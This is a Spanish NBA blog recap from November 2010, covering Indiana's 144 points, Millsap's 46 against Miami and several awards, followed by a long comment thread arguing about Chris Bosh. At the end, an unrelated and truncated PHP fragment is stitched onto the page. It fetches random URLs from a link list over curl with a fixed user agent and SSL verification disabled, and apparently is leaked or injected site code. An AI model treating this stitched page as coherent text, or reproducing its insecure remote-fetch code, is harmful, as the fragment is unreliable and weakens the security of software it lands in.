La Crónica (09/11/2010)

10 de November de 2010 por TheDeerHunter

Qué pasote de jornada, señores. Me cuesta hasta decidir por donde abrimos. Lo más espectacular fueron los 144 puntos que le endosaron los Pacers a Melo y compañía, 54 sólo en el tercer cuarto (113-144). Muchos equipos europeos anotan eso durante todo un partido.
Poco se puede hacer contra un 16 de 30 en triples y un 56 de 87 en tiros de dos. 5 miembros del equipo por encima de los 16 puntos y Dunleavy, Darren Collison y Hansbrough tocados por las musas.

Después asistimos al mejor partido hasta el momento. Un nuevo capítulo del “caza a LeBron”, porque los Heat están sufriendo en sus carnes lo que significa generar animadversión y extramotivación hacia sus rivales. Deron Williams y sobretodo Paul Millsap estuvieron monstruosos. Si el cuatro de los Jazz empieza a anotar de tres (anoche 3/3) será el acabose. Los Heat, con Wade haciendo el animal y LeBron James amasando un triple doble, se comieron a sus rivales en la primera parte pero en la segunda se hundieron. Encajaron 30 en el tercero y nada menos que 42 en el cuarto período(116-114). Pecado mortal para un equipo que vive ahora mismo de su defensa. Sin embargo aún tuvieron en sus manos llevarse el encuentro pero Wade falló un inoportuno tiro libre al final permitiendo el tiempo extra donde los Jazz se llevaron el gato al agua. Fue uno de los pocos fallos que cometió. Resulta curioso lo mucho que se está produciendo esa circunstancia al comienzo del curso actual.

Además los Cavs se ganaron a pulso su cuarta victoria doblegando a los Nets y a pesar de la terrorífica actuación de Mo Williams (93-91). 52 puntos anotaron los suplentes. Tiene lógica teniendo en cuenta la vuelta de Jamison y el gran rendimiento que vienen ofreciendo desde el banco Gibson y Sessions. Ojo porque si hoy terminara la regular habría un Cavs-Heat en primera ronda y con ventaja de campo a favor. El sueño mojado de Stern… y de Dan Gilbert.

Finalmente Hornets y Lakers mantuvieron la imbatibilidad a costa de Clippers (82-101) y Wolves (94-99). Y Blazers y Bucks se cebaron en Pistons (78-100) y Knicks (80-107). Por cierto, parece ser que Brandon Roy verá limitados sus minutos por problemas de lesiones. Buenas noticias para Rudy que ayer cuajó una más que correcta actuación.

PREMIOS

MVP: Impresionante actuación de Paul Millsap que fulminó a los Heat con 46 puntos, con una serie de 19 de 28 en tiros y 3 de 3 en triples. Además aportó 9 rebotes, 1 asistencia, 1 tapón y 1 robo. A su lado, cualquier otro partido parece una minucia.

Rookie: Primer gran partido de Al-Farouq Aminu en la NBA, 20 puntos y 8 rebotes en 30 minutos de juego. Los jóvenes toman el mano en los Clippers.

Sorpresa: Sin duda, la sorpresa de la jornada son los 144 puntos que los Pacers endosaron a los Nuggets. Producto de esta orgía anotadora son las buenas actuaciones de Mike Dunleavy (31 puntos, con 6 de 10 en triples), Brandon Rush (16 puntos y 7 rebotes) y Tyler Hansbrough (20 puntos y 9 rebotes).

Decepción: Chauncey Billups ha comenzado la temporada algo lejos de su mejor forma. Anoche no fue capaz de presentar batalla a los Pacers y sólo aportó 9 puntos y 3 asistencias. Mo Williams será otro con ganas de olvidar el partido de ayer y eso que a pesar de su 1 de 12, los Cavaliers acabaron ganando el partido.

Esfuerzo en vano: Triple doble (20 puntos, 11 rebotes y 14 asistencias.) improductivo de Lebron James y 39 puntos insuficientes de Dwyane Wade, todo un par de grandes estrellas de la liga que tuvieron que hincar la rodilla ante un segunda ronda del draft como Paul Millsap. Kevin Love también vio como sus 23 puntos, 24 rebotes y 5 asistencias también se iban a limbo.

Comenta

34 comentarios a esta entrada

  1. LEmontus dice:
    #1

    Jennigs.

      Citar

  2. -=TheKing=- dice:
    #2

    Que destrozo de 3er cuarto le han hecho los pacers, 20 de 21 tiros lanzados, la mayoría de Dunleavy y la mayoría de 3 puntos. Impresionate que metralleta, dennver da pena……..
    Por cierto Collison ha hecho también un partidazo, Carmelo, na de na, que se pire donde kiera y k no moleste más creando mal ambiente.

      Citar

  3. Txusma dice:
    #3

    Los 54 puntos de los Pacers en el tercer cuarto son de otro tiempo. De hecho suponen la cuarta mejor marca de la historia y hacía 20 años que nadie llegaba o sobrepasaba esos 54 puntos.

      Citar

  4. scriers dice:
    #4

    Tú ves a Milssap y no parece que de para tanto. Me refiero al físico. Pero luego ves los partidos y los resúmenes y entiendes que todo se debe a la movilidad. Vaya movilidad y vaya juego de pies. El tío no para, y la última canasta, la que fuerza la prórroga es muy clarividente, rapiñea todo lo que puede y más. En fin, que ese es otro que va a tener difícil seguir así (como Gasol), pero que está entre los mejores de la liga a día de hoy.

      Citar

  5. GreenPride dice:
    #5

    Esta noche he visto el Heat-Jazz. Decir que los Heat se han dejado robar el partido es poco. Con 50 y tantos segundos por delante ganaban de 8 y se han dejado anotar 4 triples (3 de Millsap) en ese tiempo, fallando además un par de tiros libres. Los triples además estuvieron bien lanzados sin que los defensores estuvieran demasiado cerca lo que es un hecho imperdonable. Además los Jazz les hicieron un agujero interior enorme. Como dato cuando llevaban 76 puntos, 48 de ellos habían sido “in the paint”, lo que habla a las claras de la falta de defensa interior de los Heat. Aún así debieron ganar el partido gracias a un Wade espectacular en ataque y a que Lebron hace de base-alero muy bien en la dirección aunque cada vez falla más lanzamientos exteriores. Por los Jazz aparte del enorme Millsap, fue Deron Williams el que ejecutó la remontada a principios del último cuarto jugando de escolta (enorme movimiento de Sloan). Un equipo peligroso los Jazz a los que le falta un puntito para ser candidatos al título pero que dará grandes disgustos a equipos punteros

      Citar

  6. portu dice:
    #6

    A mi Utah me parece un muy buen equipo, quizás pelín corto de banquillo, pero tienen 3 titulares de primerísimo nivel. Desde hace bastante tiempo veo a Boozer un poco sobrevalorado y bastaba ver cuando tenía lesiones cómo de bien lo hacía Millsap sustituyéndolo q era previsible q de titular rindiera, aunque lo de este principio de temporada es de escándalo. Además, Al Jefferson tb mejora a Okur en muchos aspectos del juego. Luego Deron, en plena madurez mental pero a tope físicamente, el 1º o 2º mejor base del campeonato… los primeros cambios y Okur cuando vuelva, tb tienen buen nivel. En definitiva, equipo mejor q años anteriores, creo q este año son el 2º mejor equipo de la Conferencia salvo q N. Orleans siga a este nivel…
    Mucho ha comentado Bosh q él es PF, supongo q en defensa tb lo será, no? y ese tal Millsap juega tb de eso, no? Pues es pronto para dar sentencias, pero Bosh huele a “haceasistencias” y no tanto a superestrella como nos habían vendido.

      Citar

  7. portu dice:
    #7

    “Hacenúmeros” quería decir…

      Citar

  8. Tiago dice:
    #8

    Haber si ahora Bosh va a ser malo…demosle tiempo. Es evidente que no va a hacer los número del año pasado pero creo que al final será fundamental.

    Por cierto, Deron es el 2º mejor base, el primero se llama Chris y se apellida Paul.

      Citar

  9. Vader dice:
    #9

    Os olvidáis de un canadiense que se llama Steve y se apellida Nash…

      Citar

  10. Sr. Lagarto dice:
    #10

    A ver, a ver…

      Citar

  11. nacho dice:
    #11

    1º o 2º supongo que irá en gustos. Yo en mi equipo preferiría a Deron, y para verlo por la tele, también. Pero como gustos, colores. Bosh no es malo, no creo que nadie diga eso, pero que ha sido un “hacenúmeros” como dice Portu no creo que lo pueda negar nadie. El año pasado me hinché a ver partidos de Toronto, y aparte de la poca sangre del equipo, muchos partidos los perdieron en los minutos finales, gracias en parte al hacenúmeros. Me da igual si es PF, C o la virgen de Guadalupe, su equipo lo necesita donde lo necesita, y él no está donde lo necesitan. Qué es pronto, vale, pero está perdiendo muchas oprotunidades, joder, que a estas alturas Bargnani está a un rebote de él (y tiene a un tal Evans al lado).

      Citar

  12. PIRATA dice:
    #12

    He visto el 3er cuarto de indiana-denver INCREIBLE UNBELIEVABLE decia el locutor, si no llega a ser por la piedra que se tira McRoberts a falta de un segundo hubieran hecho 20/20 en tiros ese cuarto.

      Citar

  13. LEmontus dice:
    #13

    hay que ser un poco golfo para decir que Bosh es un hace números.

      Citar

  14. portu dice:
    #14

    Una cosa LEmontus es q quieras ir de original, graciosillo o lo q sea, pero otra cosa bien distinta es insultar… aquí hablamos de NBA, opinamos y cada cual dice lo q quiere con respeto. Bastantes tontadas has soltado tú desde q apareces por aquí como para seguir teniendo la caradura de seguir “vaticinando” y dictando sentencias como sueles hacer. Mucho menos para llamarme golfo. Sobras.

      Citar

  15. LEmontus dice:
    #15

    Mis vaticinios tienden a cumplirse es la diferencia entre un golfo y LEmontus.

      Citar

  16. portu dice:
    #16

    Te vas a quedar con las ganas de q entre en discusiones contigo. Sobras.

      Citar

  17. Scriers dice:
    #17

    Joe. Por decir que bosh es un “hacenumeros” alguien se convierte en un golfo? Viola a viejas y roba a gente? No se… yo es que siempre lo vi preocupado por sus marcas individuales. Preparado para dar el salto. Y oye. Lo ha conseguido. Otra cosa es que. Ademas. Sea un superclase a la hora de buscarse sus propias canastas, que lo es.

      Citar

  18. LEmontus dice:
    #18

    Bosh dejó el año pasado a Tortonto con opciones de Po hasta las últimas jornadas (la última si no recuerdo mal). Y no se si hace falta decirlo pero en esos raptors probablemente haya tenido el peor equipo que puede tener una estrella a su alrededor con la peor versión de Calde y Turkoglu y solo con la ayuda de Bargnani.

    Wall por ejemplo con un equipo a su alrededor mucho mejor que el de Bosh o el de jennings el año pasado, está haciendo números pero siempre en momentos poco importantes ,a la contra cuando el partido está roto…. eso por no mencinonar la cantidad de asistencias fáciles que hace(gracias a hrinch sobre todo).

    Dicho ésto me sigue pareciendo que porque ahora bosh esté en miami y no tenga los tiros que tiene que tener y miami haya perdido una par de partidos califcarle de ”hace números” me parece de golfo.

      Citar

  19. LEmontus dice:
    #19

    Scriers no se que entiendes tú por golfo pero yo tengo amigos golfos que no roban a gente o violan viejas.

      Citar

  20. nacho dice:
    #20

    Hola, soy un golfo. Y un golfo que en los dos últimos años ha visto mucho Torontotorontontero (de eso me viene mi versión golfa), y Bosh es un HACENÚMEROS, lo que no quita que sea bueno, que se busque sus propios tiros y que tenga un idilio con LE.

      Citar

  21. nacho dice:
    #21

    Por cierto, estoy viendo MIami utah, y brutal lo de MiIlsap.

      Citar

  22. LEmontus dice:
    #22

    Hola Nacho.

      Citar

  23. nacho dice:
    #23

    Hola LE, por cierto, me lo paso bien con tus comentarios, aprendo algunas veces y comparto tus opiniones otras, y molan tus salidas de tono.

      Citar

  24. scriers dice:
    #24

    Obviamente, exagerada. Era para que constara que no creo que haga golfo a alguien el decir que Bosh es un hacenúmeros. Para que se me entienda 😀

      Citar

  25. Tiago dice:
    #25

    En serio llamar a Bosh hacenumeros es desvariar por completo…no se que esperais entonces de un jugador, si no gana anillos es un hacenúmeros?

    Y si lemontus es un golfo por decir eso, vivan los golfos

      Citar

  26. Txusma dice:
    #26

    No, en teoría el golfo era el que opinaba que Bosh es un poco ‘hacenúmeros’.

    Lemontus, te lo pido por favor. Piénsate dos veces las cosas antes de escribirlas. Lo que a ti o a mi nos puede parece gracioso puede no serlo para otra persona y sentirse ofendida. El respeto por encima de todo. Si esto se convierte en una cueva de trolls insultándose mutuamente, cosa que no es ahora mismo, directamente dejaremos de dedicarle tiempo al blog…

      Citar

  27. Denise dice:
    #27

    “””Mis vaticinios tienden a cumplirse es la diferencia entre un golfo y LEmontus.”” by Lemontus. xD jajajja
    Frase mitica que quedará para la posteridad del blog y que a finales de temporada veremos si los vaticinios de cumplen.
    Lemontus ¿de donde viene tu nick?, me gusta.

      Citar

  28. Tiago dice:
    #28

    Lemontus for president.

    El nick del susodicho es como la receta de la coca-cola, es imposible conocer su origen.

      Citar

  29. LEmontus dice:
    #29

    Si dijera el origen de mi nombre tendría que mataros … xD

      Citar

  30. nacho dice:
    #30

    Voy a hacer un poco de historia para llegar al HACENÚMEROS.
    Yo nací al baloncesto cuando los últimos estertores de Cabrera. Flipé con Corbalán, Solozabal, Itu, Rullán (sí, cuando los pivots no tenían cintura) Epi, Chicho, Delibasic… y no quiero aburrir con nombres que supongo todos conocemos. Descubrí que este deporte era un deporte de EQUIPO. Luego quise imitar todos los movimientos de Petrovic, para mí el gran crack de este deporte (para otros igual un hacenúmeros). Y aún así lo consideraba juego de equipo.
    No aburro más.
    He visto a Bosh quitarle rebotes de las manos a compañeros, muchos. Tirarse lo que no debe, muchas veces perdiendo de la hostia, borrarse en finales de partido… yo a eso lllamo hacenúmeros, otros que es un jugador agresivo, que no da el partido por perdido… Gustos, visiones diferentes… Pero yo no lo tendría en mi equipo, creo que hay jugadores que aportan más aunque no sean buenos “actores”.

      Citar

  31. aro_pasado_no_newtoniano dice:
    #31

    Lemontus dimissió¡¡¡

      Citar

  32. LEmontus dice:
    #32

    viendo que no vas a cambiar de opinión .. solo diré que yo si lo quiero en mi equipo u l amayoría de los entrenadores de la nba si tuvieran que elegir un 4 tras pau(que es 5) y probablemente dirk se quedarían con Bosh.

      Citar

  33. Viva_Dirk dice:
    #33

    @Nacho: Estoy deacuerdo en que Bosh ha tenido etapas de hacenúmeros, no se puede negar eso. Pero yo sin embargo si creo que se esta adaptando bien a Miami, es decir, Wade y Lebron estan sumando 33 tiros y el no llega a 12 por partido, estoy seguro de que su cifra reboteadora subirá, aunque tanto Wade como Lebron son jugadores a los que les gusta que les cierren el rebote defensivo para sumar.

    La único queja que tengo de Bosh en Miami hasta ahora es su porcentaje de tiro y un poco el rebote ofensivo. Pero ni esta forzando tiros ni esta defendiendo mal.

      Citar

  34. portu dice:
    #34

    Lo q dices es cierto Viva, yo no valoro demasiado el bajar en nº de rebotes y es lógico q pierda tiros… lo q pasa es q no te puede llegar Millsap a tu casa, PF de poco más de 2 m, y hacerte casi 40 ptos con porcentajes de tiro escandalosamente altos… y vuelvo a repetir, nos han vendido a Bosh como una superestrella. Sabes q tb criticaba a Garnett cuando se dedicaba a pelar con sus compañeros en Miny por los rebotes, llegó a Boston y bajó en todas las estadísticas, pero claro, se transformó en una bestia en defensa. Ese cambio es el q espero de Bosh, q apriete atrás, q juegue en ataque más cerca del aro y no con tantos tiritos de fuera y sobretodo, q esté a tope de intensidad.

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>